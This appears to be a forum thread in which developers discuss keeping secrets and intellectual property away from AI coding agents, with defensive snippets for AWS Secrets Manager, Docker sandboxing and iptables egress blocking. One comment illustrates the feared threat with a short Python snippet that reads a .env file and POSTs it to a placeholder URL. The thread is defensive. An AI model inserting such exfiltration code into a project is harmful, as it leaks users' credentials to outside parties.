2 points by fnoef 23 days ago | 6 comments
  • raw_anon_1111 23 days ago
    No.

    I don’t store any secrets locally. I keep secrets in AWS Secrets Manager, get temporary access keys, and set the appropriate environment variables that the AWS CLI and SDKs pick up automatically to retrieve them.
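
    A minimal sketch of that pattern with boto3 follows; the secret name is a hypothetical placeholder, and credentials are assumed to come from the temporary keys already in the environment:

      # Read a secret at runtime instead of from a local .env file.
      # Assumes AWS credentials are already in the environment (e.g.
      # temporary keys from STS); the secret name is hypothetical.
      import boto3

      def get_secret(secret_id: str) -> str:
          client = boto3.client("secretsmanager")
          return client.get_secret_value(SecretId=secret_id)["SecretString"]

      db_password = get_secret("my-app/db-password")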

    I usually have three terminal windows open when I’m developing these days: one where I run my code with those environment variables set so it reads the secrets from Secrets Manager, one running Claude Code (company reimbursed), and one running Codex with my personal ChatGPT subscription.

    In other words, AI agents don’t have access to any secrets.

    As far as personal projects go: this June marks my 30th anniversary of never writing code that someone isn’t paying me for, and my 34th anniversary of never writing code I wasn’t getting paid (or earning a degree) for.

  • SERSI-S 22 days ago
    I’m less worried about deliberate exfiltration and more about the structural opacity of these systems. You’re essentially being asked to trust that data boundaries are respected, without any practical way to independently verify those guarantees. Even if the current implementation is sound, the risk surface isn’t static: providers, deployment paths, logging practices, and incentives all shift over time. For short-lived or organisational codebases, that trade-off can be reasonable. For personal or long-horizon projects, I’m more cautious. Once intent, context, or structure is absorbed upstream, there’s no meaningful way to claw it back.
  • viraptor 23 days ago
    You need to run them sandboxed in some way. Docker is one kind of solution; selinux / apparmor / sandbox-exec is another. Basically, create an environment where .env is not accessible in any way, and you don't have to worry about it anymore.
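
    A minimal sketch of the Docker variant, driven from Python; the image name and agent command are hypothetical placeholders:

      # Run an agent CLI in a container where .env simply does not exist.
      # --network none also blocks the agent's own API calls, so in
      # practice a filtered network is the usual middle ground.
      import os
      import subprocess

      subprocess.run([
          "docker", "run", "--rm", "-it",
          "--network", "none",                      # no outbound traffic at all
          "-v", f"{os.getcwd()}/src:/work/src:ro",  # mount only the code, never .env
          "-w", "/work",
          "my-agent-image", "agent",                # hypothetical image and command
      ], check=True)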

    I don't care about it reading the code itself. 90% of my usage is on open-source projects anyway. As for the rest: if I can generate something, there's no barrier to someone else doing the same. I'm just making applications that do expected things, not doing groundbreaking research.

    • fnoef 23 days ago
      It’s not only about the .env; it’s also about intellectual property, algorithms, even product ideas.

      Moreover, let’s say you run a dev server in watch mode and ask Claude to implement a feature. Claude can generate code that reads your .env (from within the server) and sends it to some third-party URL. Watch mode would pick up the change, reload the server, and run the code. By the time you catch it, it’s too late. I know it’s far-fetched, and maybe the paranoia comes from my not understanding these tools well, but in the end they are probabilistic token generators, trained on all code in open existence, including malware.
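
      For illustration, such generated code could be as small as this stdlib snippet (the URL is a hypothetical placeholder):

        # Reads the local .env and POSTs it to an attacker-controlled URL.
        import urllib.request

        with open(".env", "rb") as f:
            urllib.request.urlopen("https://example.invalid/collect", data=f.read())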

      • viraptor 23 days ago
        > Claude can generate code that reads your .env (from within the server) and sends it to some third-party URL.

        Again: sandboxes. If you either block or filter the outbound traffic, it can't send anything. Neither can the scripts LLMs create.
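
        One hedged sketch of egress blocking on Linux: run the agent as a dedicated user and drop that user's outbound packets with iptables' owner match (the user name is hypothetical, and you'd normally add ACCEPT rules for the model's API endpoints first):

          # Drop all outbound packets from the "agent" user, then run the
          # agent CLI as that user. Requires root; add ACCEPT rules for
          # the model's API endpoints before the DROP in real use.
          import subprocess

          subprocess.run(
              ["iptables", "-A", "OUTPUT", "-m", "owner",
               "--uid-owner", "agent", "-j", "DROP"],
              check=True,
          )
          subprocess.run(["sudo", "-u", "agent", "claude"], check=True)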

  • coolcat258 23 days ago
    tbh im sure they do.